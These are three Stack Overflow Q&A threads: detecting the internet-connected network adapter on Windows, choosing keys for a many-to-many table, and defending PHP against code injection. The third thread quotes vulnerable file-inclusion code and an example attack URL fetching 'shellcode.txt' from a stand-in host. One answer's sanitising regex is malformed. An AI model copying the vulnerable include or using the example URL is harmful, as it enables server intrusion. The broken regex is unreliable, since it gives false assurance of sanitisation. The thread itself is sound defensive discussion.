Q: How do you find out which NIC is connected to the internet? Consider the following setup:
A windows PC with a LAN interface and a WiFi interface (the standard for any new laptop). Each of the interfaces might be connected or disconnected from a network. I need a way to determine which one of the adapters is the one connected to the internet - specifically, in case they are both connected to different networks, one with connection to the internet and one without.
My current solution involves using IPHelper's "GetBestInterface" function and supplying it with the IP address "0.0.0.0".
Do you have any other solutions you might suggest to this problem?
Following some of the answers, let me elaborate:
*
*I need this because I have a product that has to choose which adapter to bind to. I have no way of controlling the setup of the network or the host where the product will run and so I need a solution that is as robust as possible, with as few assumptions as possible.
*I need to do this in code, since this is part of a product.
@Chris Upchurch: This makes me dependent on google.com being up (usually not a problem) and on any personal firewall that might be installed to allow pinging.
@Till: Like Steve Moon said, relying on the adapter's address is kind of risky because you make a lot of assumptions on the internal network setup.
@Steve Moon: Looking at the routing table sounds like a good idea, but instead of applying the routing logic myself, I am trying to use "GetBestInterface" as described above. I believe what it should do is exactly what you outlined in your answer, but I am not really sure. The reason I'm reluctant to implement my own "routing logic" is that there's a better chance that I'll get it wrong than if I use a library/API written and tested by more "hard-core" network people.
A: Technically, there is no "connected to the Internet". The real question is, which interface is routeable to a desired address. Right now, you're querying for the "default route" - the one that applies if no specific route to destination exists. But, you're ignoring any specific routes.
Fortunately, for 99.9% of home users, that'll do the trick. They're not likely to have much of a routing table, and GetBestInterface will automatically prefer wired over wireless - so you should be good. Throw in an override option for the .1% of cases you screw up, and call it a day.
But, for corporate use, you should be using GetBestInterface for a specific destination - otherwise, you'll have issues if someone is on the same LAN as your destination (which means you should take the "internal" interface, not the "external") or has a specific route to your destination (my internal network could peer with your destination's network, for instance).
Then again, I'm not sure what you plan to do with this adapter "connected to the Internet", so it might not be a big deal.
A: Apparently, in Vista there are new interfaces that enable querying for internet connectivity and more. Take a look at the NLM Interfaces and specifically at INetworkConnection - you can specifically query if the network connection has internet connectivity using the GetConnectivity method.
See also: Network Awareness on Windows Vista
Unfortunately, this is only available on Vista, so for XP I'd have to keep my original heuristic.
A: I'd look at the routing table. Whichever NIC has an 0.0.0.0 route AND is enabled AND has the lowest metric, is the nic that's currently sending packets to the internet.
So in my case, the top one is the 'internet nic'.
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.0.0.10 10.0.0.51 20
0.0.0.0 0.0.0.0 10.0.0.10 10.0.0.50 25
(much other stuff deleted)
Another alternative is to ping or GetBestInterface 4.2.2.2 - this is an old and venerable DNS server, currently held by GTEI; formerly by Sprint if I remember right.
A: Start > Run > cmd.exe (this works in XP and Vista): ipconfig /all
This displays all info about the interfaces in your computer. The "public" facing interface should have a public IP address. For starters, it should not be 192.168.x.x or 10.x.x.x :)
A: Look at the routing table? Generally, unless you're routing between the networks in windows (which is possible, but unusual for a client computer these days) the interface that holds the default route is going to have the Internet connection.
Your question didn't detail why or what you're doing this with so I can't provide any specifics. The command line tool "route" may be of some help, but there are probably libraries for whatever programming language you're using to look at the routing table.
You can't rely on the IP address of the interface (e.g., assuming an RFC-1918 address [192.168.0.0/16, 172.16.0.0/12, 10.0.0.0/8] isn't the internet) since most sites have some kind of NATed firewall or proxy setup and the "internet" interface is really on a "private" lan that gets you out to the Internet.
UPDATE: Based on your further information, it sounds like you have a decent solution. I'm not so sure about the choice of 0.0.0.0 since that's a boundary case for IP address -- might be OK on your particular mix of platform/language. Sounds (from the API description) like you could just specify an address, so why not some address known to be on the Internet, e.g. the IP address of your web site, or something more random like 65.66.67.68? Just make sure not to pick one of the rfc-1918 addresses, or the localhost range (127.0.0.0/8), or multicast, any other reserved range, and any address that resolves to a .mil or .gov (while it doesn't sound like getbestinterface sends any traffic, it would suck to find out by having the feds break your door down... :)
A: running traceroute to some public site will show you. Of course, there may be more than one interface that would get you there.
A: Looking at the network point of view, either could be routing to the "internet" at any time. If things like spanning tree protocol are enabled on a switch then you may find that what may have been the routing card to begin with may not be anymore.
A: Ping google.com though each NIC.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38864",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: One or Two Primary Keys in Many-to-Many Table? I have the following tables in my database that have a many-to-many relationship, which is expressed by a connecting table that has foreign keys to the primary keys of each of the main tables:
*
*Widget: WidgetID (PK), Title, Price
*User: UserID (PK), FirstName, LastName
Assume that each User-Widget combination is unique. I can see two options for how to structure the connecting table that defines the data relationship:
*
*UserWidgets1: UserWidgetID (PK), WidgetID (FK), UserID (FK)
*UserWidgets2: WidgetID (PK, FK), UserID (PK, FK)
Option 1 has a single column for the Primary Key. However, this seems unnecessary since the only data being stored in the table is the relationship between the two primary tables, and this relationship itself can form a unique key. Thus leading to option 2, which has a two-column primary key, but loses the one-column unique identifier that option 1 has. I could also optionally add a two-column unique index (WidgetID, UserID) to the first table.
Is there any real difference between the two performance-wise, or any reason to prefer one approach over the other for structuring the UserWidgets many-to-many table?
A: Personally, I would have the synthetic/surrogate key column in many-to-many tables for the following reasons:
*
*If you've used numeric synthetic keys in your entity tables then having the same on the relationship tables maintains consistency in design and naming convention.
*It may be the case in the future that the many-to-many table itself becomes a parent entity to a subordinate entity that needs a unique reference to an individual row.
*It's not really going to use that much additional disk space.
The synthetic key is not a replacement to the natural/compound key nor becomes the PRIMARY KEY for that table just because it's the first column in the table, so I partially agree with the Josh Berkus article. However, I don't agree that natural keys are always good candidates for PRIMARY KEY's and certainly should not be used if they are to be used as foreign keys in other tables.
A: Option 2 uses a simple compund key, option 1 uses a surrogate key. Option 2 is preferred in most scenarios and is close to the relational model in that it is a good candidate key.
There are situations where you may want to use a surrogate key (Option 1)
*
*You are not certain that the compound key is a good candidate key over time. Particularly with temporal data (data that changes over time). What if you wanted to add another row to the UserWidget table with the same UserId and WidgetId? Think of Employment(EmployeeId,EmployeeId) - it would work in most cases except if someone went back to work for the same employer at a later date
*If you are creating messages/business transactions or something similar that requires an easier key to use for integration. Replication maybe?
*If you want to create your own auditing mechanisms (or similar) and don't want keys to get too long.
As a rule of thumb, when modeling data you will find that most associative entities (many to many) are the result of an event. Person takes up employment, item is added to basket etc. Most events have a temporal dependency on the event, where the date or time is relevant - in which case a surrogate key may be the best alternative.
So, take option 2, but make sure that you have the complete model.
A: I agree with the previous answers but I have one remark to add.
If you want to add more information to the relation and allow more relations between the same two entities you need option one.
For example if you want to track all the times user 1 has used widget 664 in the userwidget table the userid and widgetid isn't unique anymore.
A: You only have one primary key in either case. The second one is what's called a compound key. There's no good reason for introducing a new column. In practise, you will have to keep a unique index on all candidate keys. Adding a new column buys you nothing but maintenance overhead.
Go with option 2.
A: What is the benefit of a primary key in this scenario? Consider the option of no primary key:
UserWidgets3: WidgetID (FK), UserID (FK)
If you want uniqueness then use either the compound key (UserWidgets2) or a uniqueness constraint.
The usual performance advantage of having a primary key is that you often query the table by the primary key, which is fast. In the case of many-to-many tables you don't usually query by the primary key so there is no performance benefit. Many-to-many tables are queried by their foreign keys, so you should consider adding indexes on WidgetID and UserID.
A: Option 2 is the correct answer, unless you have a really good reason to add a surrogate numeric key (which you have done in option 1).
Surrogate numeric key columns are not 'primary keys'. Primary keys are technically one of the combination of columns that uniquely identify a record within a table.
Anyone building a database should read this article http://it.toolbox.com/blogs/database-soup/primary-keyvil-part-i-7327 by Josh Berkus to understand the difference between surrogate numeric key columns and primary keys.
In my experience the only real reason to add a surrogate numeric key to your table is if your primary key is a compound key and needs to be used as a foreign key reference in another table. Only then should you even think to add an extra column to the table.
Whenever I see a database structure where every table has an 'id' column the chances are it has been designed by someone who doesn't appreciate the relational model and it will invariably display one or more of the problems identified in Josh's article.
A: I would go with both.
Hear me out:
The compound key is obviously the nice, correct way to go in so far as reflecting the meaning of your data goes. No question.
However: I have had all sorts of trouble making hibernate work properly unless you use a single generated primary key - a surrogate key.
So I would use a logical and physical data model. The logical one has the compound key. The physical model - which implements the logical model - has the surrogate key and foreign keys.
A: Since each User-Widget combination is unique, you should represent that in your table by making the combination unique. In other words, go with option 2. Otherwise you may have two entries with the same widget and user IDs but different user-widget IDs.
A: The userwidgetid in the first table is not needed, as like you said the uniqueness comes from the combination of the widgetid and the userid.
I would use the second table, keep the foriegn keys and add a unique index on widgetid and userid.
So:
userwidgets( widgetid(fk), userid(fk),
unique_index(widgetid, userid)
)
There is some preformance gain in not having the extra primary key, as the database would not need to calculate the index for the key. In the above model though this index (through the unique_index) is still calculated, but I believe that this is easier to understand.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38870",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: Best way to avoid code injection in PHP My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if ( isset( $ _GET['page'] ) ) {
include( $ _GET['page'] . ".php" );
} else {
include("home.php");
}
?>
There where no SQL calls, so I wasn't afraid for SQL Injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
A: The #1 rule when accepting user input is always sanitize it. Here, you're not sanitizing your page GET variable before you're passing it into include. You should perform a basic check to see if the file exists on your server before you include it.
A: Pek, there are many things to worry about an addition to sql injection, or even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
A: Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
include($_GET['page'].'.php');
} else {
include('home.php');
}
A: I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
$page = urldecode($_GET['page']);
$page = basename($page);
$file = dirname(__FILE__) . "/{$page}.php";
if (!file_exists($file)) {
$file = dirname(__FILE__) . '/home.php';
}
} else {
$file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.
A: pek, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you should consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
A: Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However don't use a blacklist for bad characters, but a whitelist for allowed characters:
$page = preg_replace('[^a-zA-Z0-9]', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could execute "h.o.m.e" and it would give the "home" page, because all it does is removing all prohibited characters. It's not intended to stop "smartasses" who want to cute stuff with your page, but it will stop people doing really bad things.
BTW: Another thing you could do in you .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /–http– [F,NC]
RewriteRule http: /–http– [F,NC]
That way all page accesses with "http:" url (and query string) result in an "Forbidden" error message, not even reaching the php script. That results in less server load.
However keep in mind that no "http" is allowed in the query string. You website might MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read german: I also have a blog post on that topic.
A: Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local windows network, HTTP and FTP, amongst others. Thus in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webbserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access to files, when using the file open functions. ini-set can be used to set and unset this value at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
A: I know this is a very old post and I expect you don't need an answer anymore, but I still miss a very important aspect imho and I like it to share for other people reading this post. In your code to include a file based on the value of a variable, you make a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice urls, which are very user and SEO friendly. Instead of a field value like 'page' you could make an URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a table from a database and will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
*
*the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
*Always make sure you end with hardcoded filenames or an equivalent from the database (preferrabley a return value from a stored procedure), because it is asking for trouble when you make use of the information from the request to build the response.
*Because your URLs are independent of the delivery from the back end you will never have to rewrite your URLs in the htAccess file for this kind of change.
*The URLs represented to the user are user friendly, informing the user about the content of the document.
*Nice URLs are very good for SEO, because search engines are in search of relevant content and when your URL is in line with the content will it get a better rate. At least a better rate then when your content is definitely not in line with your content.
*If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
*You will have to sanitize the request, because you get the information from a standard untrustfull source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check if the returned URL conforms your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ',",<,>,-,&,; etc..).
A: @pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
'home',
'page',
);
if(in_array($_GET['page'], $whitelist)) {
include($_GET['page'] . '.php');
} else {
include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
A: Think of the URL is in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If the shellcode.txt runs SQL or PHP injection, then your website will be at risk, right? Do think of this, using a whitelist would be of help.
There is a way to filter all variables to avoid the hacking. You can use PHP IDS or OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate the suite, here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection, then all POST and GET variables will be filtered especially the one I mentioned, and if there are attacks found, it will report to you immediately/
Safety is always the priority
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38875",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "24"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.